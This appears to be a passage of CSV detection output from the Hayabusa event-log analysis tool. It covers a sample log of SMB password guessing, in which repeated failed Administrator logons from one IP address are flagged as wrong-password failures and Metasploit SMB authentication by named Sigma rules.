Password,User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
